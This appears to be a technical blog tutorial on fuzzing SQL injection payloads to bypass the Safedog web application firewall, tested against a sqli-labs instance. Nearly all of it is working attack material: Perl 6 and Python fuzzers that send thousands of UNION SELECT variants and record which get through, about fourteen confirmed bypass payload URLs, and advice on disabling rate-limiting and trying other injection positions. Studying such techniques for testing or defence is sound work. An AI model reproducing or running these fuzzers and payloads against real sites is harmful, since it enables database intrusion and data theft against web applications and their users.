Safedog version: Apache 4.0
Website: PHP + MySQL
System: Windows 2003
Here we only fuzz the bytes between /*!union and select*/:
/*!union<FUZZ_HERE>select*/
There are plenty of other positions to choose from.
Use whatever scripting language you like; I use Perl 6 here.
Let's go step by step.
To build the exp I used the following code (test code only, it just prints the candidates):

#!/usr/bin/env perl6
# Three token classes: comment fragments, the digits 0-9, and the literal
# strings '%0a'..'%0z' (a string range, so this is the text "%0a", not a byte)
my @fuzz_sp = '/*', '*/', '/*!', '?', '*', '=', '';
my @fuzz_nu = 0..9;
my @fuzz_ch = '%0a'..'%0z';
my @fuzz_all;
@fuzz_all.append(@fuzz_sp);
@fuzz_all.append(@fuzz_nu);
@fuzz_all.append(@fuzz_ch);
for @fuzz_all -> $exp { say $exp; }
say '-' x 30;
# Five nested loops: every 5-token combination goes between /*!union and select*/
for @fuzz_all -> $a {
  for @fuzz_all -> $b {
    for @fuzz_all -> $c {
      for @fuzz_all -> $d {
        for @fuzz_all -> $e {
          say '/*!union' ~ $a ~ $b ~ $c ~ $d ~ $e ~ 'select*/';
        }
      }
    }
  }
}
Build the character set however you like: assemble it by hand, download a ready-made wordlist, or check whether your scripting language has a fuzzing module you can reuse.
In Perl 6, writing a file needs no explicit buffer handling: open it with open, pass :a to append, and use the handle to save the rules that get through. Test code:

#!/usr/bin/env perl6
my $file = '/home/perl/Desktop/test.txt';
my $fp = open $file, :a;   # :a = append mode
my $a = 1;
my $b = 2;
$fp.say($a ~ $b);          # writes the line "12"
#$fp.flush;
sleep(120);                # look at the file while the script is still running

Whether the line shows up on disk before the sleep ends depends on the Rakudo release (newer builds buffer output to files), so uncomment $fp.flush, or close the handle, if you rely on seeing hits immediately.
When doing a GET with the HTTP::UserAgent module in Perl 6, remember to URL-encode the special characters, otherwise get dies. The uri_encode routine from the URI::Encode module does the job.
A short test:

use HTTP::UserAgent;
use URI::Encode;

my $url     = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\'';
my $payload = '/*!union/*!/*!select*/1,2,3-- -';
say uri_encode($url ~ $payload);            # print the encoded URL
my $targeturl = uri_encode($url ~ $payload);
my $ua     = HTTP::UserAgent.new;
my $result = $ua.get($targeturl);
say $result.content;
# sqli-labs Less-1 prints "Your Login name" when the UNION query ran
if $result.content ~~ /'Your Login name'/ { say 'Bypass!' }
The test target is sqli-labs.
Search the response for the marker string; if it is there, the UNION query executed, which means the payload got past the WAF.
The final fuzz version:

use HTTP::UserAgent;
use URI::Encode;

my $url = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\'';
# hits are appended to this file
my $file = '/home/perl/Desktop/safedog_exp.txt';
my $fp = open $file, :a;
my $ua = HTTP::UserAgent.new;

my @fuzz_sp = '/*', '*/', '/*!', '?', '*', '=', '';
my @fuzz_nu = 0..9;
my @fuzz_ch = '%0a'..'%0z';
my @fuzz_all;
@fuzz_all.append(@fuzz_sp);
@fuzz_all.append(@fuzz_nu);
@fuzz_all.append(@fuzz_ch);

# 43 tokens in 5 positions: 43**5 = 147,008,443 requests if run to completion
for @fuzz_all -> $a {
  for @fuzz_all -> $b {
    for @fuzz_all -> $c {
      for @fuzz_all -> $d {
        for @fuzz_all -> $e {
          my $exp = '/*!union' ~ $a ~ $b ~ $c ~ $d ~ $e ~ 'select*/1,2,3-- -';
          my $targeturl = uri_encode($url ~ $exp);
          say 'Check url:' ~ $targeturl;
          #sleep(2);    # throttle here once Safedog starts banning the IP
          my $result = $ua.get($targeturl);
          if $result.content ~~ /'Your Login name'/ {
            say "Bypass!\a\a\a\a\a\a\a ---> " ~ $url ~ $exp;   # \a rings the terminal bell
            $fp.say($url ~ $exp);
            sleep(5);
          }
        }
      }
    }
  }
}

Two things to keep in mind with this loop: the full cartesian product is far too large to run to the end against a live box, so cut the token set or the depth down (or sample) before you start; and the script only looks for the marker, so a ban page or a 5xx from a crashed MySQL just looks like "no bypass". Check the status code or watch the output so you notice when the target stops answering properly.
Some rules the fuzzer found:
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/**//*!/*!select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0b*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0e*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0f*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0g*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0h*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0i*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0j*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0k*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0l*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0m*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0n*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0o*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0p*/select*/1,2,3-- -

Note that %0g through %0p are not valid percent-escapes at all, so at least those hits are about the literal characters sitting inside the comment, not about a control byte. Before reading anything into the %0b hit, look at the encoded request in a proxy to see what the server actually received.
Note:
If you fuzz too fast, Safedog bans the source IP by default, and the site's MySQL sometimes falls over.
For the test you can turn off Safedog's anti-CC and IP-blacklist features.
After fuzzing:
Once the run is done, compare the payloads that got through, look for what they have in common, and write the pattern down.
As for the fuzz position, try other spots as well, for example:
union<FUZZ_HERE>/*select
<FUZZ_HERE>union<FUZZ_HERE>select
/*!36000uNION<FUZZ_HERE>*/selecT
...
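The fuzz loop, the "look for a pattern" step and the alternative fuzz positions above, as an added example in Python (this is not the post's code, which is Perl 6). It keeps the page's token classes, sqli-labs URL and "Your Login name" marker; everything else is assumed: the template takes any number of <FUZZ_HERE> slots, `encode()` is my approximation of uri_encode (reserved characters kept, space and the % sign escaped), `fake_send` is a constructed stand-in for the target so the loop runs offline, and `PAGE_HITS` are the 14 payloads listed above with the base URL removed.

```python
import itertools
import random
import re
import time
import urllib.parse
import urllib.request
from collections import Counter

# Token classes from the page's Perl 6 script.  '%0a'..'%0z' are literal strings.
FUZZ_SP = ['/*', '*/', '/*!', '?', '*', '=', '']
FUZZ_NU = [str(n) for n in range(10)]
FUZZ_CH = ['%0' + chr(c) for c in range(ord('a'), ord('z') + 1)]
FUZZ_ALL = FUZZ_SP + FUZZ_NU + FUZZ_CH          # 43 tokens

SLOT = '<FUZZ_HERE>'
MARKER = 'Your Login name'   # what sqli-labs Less-1 prints when the UNION ran
BASE = "http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'"   # the page's target


def fill(template, pieces, slot=SLOT):
    """Replace the slots in `template` left to right with the strings in `pieces`."""
    for piece in pieces:
        template = template.replace(slot, piece, 1)
    return template


def exhaustive(template, depth=5, alphabet=FUZZ_ALL, slot=SLOT):
    """Every candidate, each slot filled with `depth` tokens.  The page's setup
    (43 tokens, one slot, depth 5) is 43**5 = 147,008,443 requests."""
    slots = template.count(slot)
    for combo in itertools.product(alphabet, repeat=depth * slots):
        pieces = [''.join(combo[i * depth:(i + 1) * depth]) for i in range(slots)]
        yield fill(template, pieces, slot)


def sample(template, n, depth=5, alphabet=FUZZ_ALL, slot=SLOT, seed=0):
    """`n` distinct random candidates: a cheap first pass before an exhaustive run."""
    rng = random.Random(seed)
    slots = template.count(slot)
    n = min(n, len(alphabet) ** (depth * slots))   # never ask for more than exist
    seen = set()
    while len(seen) < n:
        pieces = [''.join(rng.choice(alphabet) for _ in range(depth)) for _ in range(slots)]
        seen.add(fill(template, pieces, slot))
    return sorted(seen)


def encode(url):
    """Assumed equivalent of the page's uri_encode(): URL-reserved characters stay,
    space and '%' are escaped, so the token '%0b' reaches PHP as three literal bytes."""
    return urllib.parse.quote(url, safe="/:?=&'*!(),-")


def http_get(url, timeout=10):
    """Real transport; the test injects fake_send instead."""
    with urllib.request.urlopen(encode(url), timeout=timeout) as resp:
        return resp.read().decode('utf-8', 'replace')


def run(base, payloads, send=http_get, marker=MARKER, delay=0.0):
    """Return the payloads whose response body contains `marker`.  `delay` throttles
    the loop (the page warns Safedog bans the source IP when hit too fast)."""
    hits = []
    for p in payloads:
        if marker in send(base + p):
            hits.append(p)
        if delay:
            time.sleep(delay)
    return hits


def middles(payloads, prefix='/*!union', suffix='select*/'):
    """Strip the fixed parts of the template so only the fuzzed bytes remain."""
    out = []
    for p in payloads:
        i = p.find(prefix)
        j = p.find(suffix, i + len(prefix)) if i >= 0 else -1
        if j >= 0:
            out.append(p[i + len(prefix):j])
    return out


def common_prefix(strings):
    pre = strings[0] if strings else ''
    for s in strings[1:]:
        while not s.startswith(pre):
            pre = pre[:-1]
    return pre


def summarize(hits):
    """The page's 'look for a pattern' step: the longest prefix shared by every fuzzed
    region, plus a count of each shape with the '%0?' token collapsed to '%0X'."""
    mids = middles(hits)
    return common_prefix(mids), Counter(re.sub(r'%0[a-z]', '%0X', m) for m in mids)


# The 14 bypass payloads reported on the page, base URL removed.
PAGE_HITS = ['/*!union/*/**//*!/*!select*/1,2,3-- -'] + [
    f'/*!union/*/*?%0{c}*/select*/1,2,3-- -' for c in 'befghijklmnop']


def fake_send(url):
    """Constructed stand-in for the target: only the '/*/*?%0?*/' shape gets through."""
    if re.search(r'/\*/\*\?%0[a-z]\*/', url):
        return '<br>Your Login name:Dumb<br>Your Password:Dumb'
    return 'You have an error in your SQL syntax'


if __name__ == '__main__':
    print(summarize(PAGE_HITS))
    # Dry run of the loop against the fake target with 2,000 random candidates;
    # swap fake_send for http_get (and set delay) to hit the real box.
    print(run(BASE, sample(f'/*!union{SLOT}select*/1,2,3-- -', 2000), send=fake_send))
```

Passing the transport in as `send` is what makes the loop testable without a Safedog box; it also makes it easy to slot in a session that goes through a proxy so you can see the encoded request. `summarize(PAGE_HITS)` returns the shared prefix `/*/*` and two shapes, `/*/*?%0X*/` (13 hits) and `/*/**//*!/*!` (1 hit), which is the pattern the post asks you to look for.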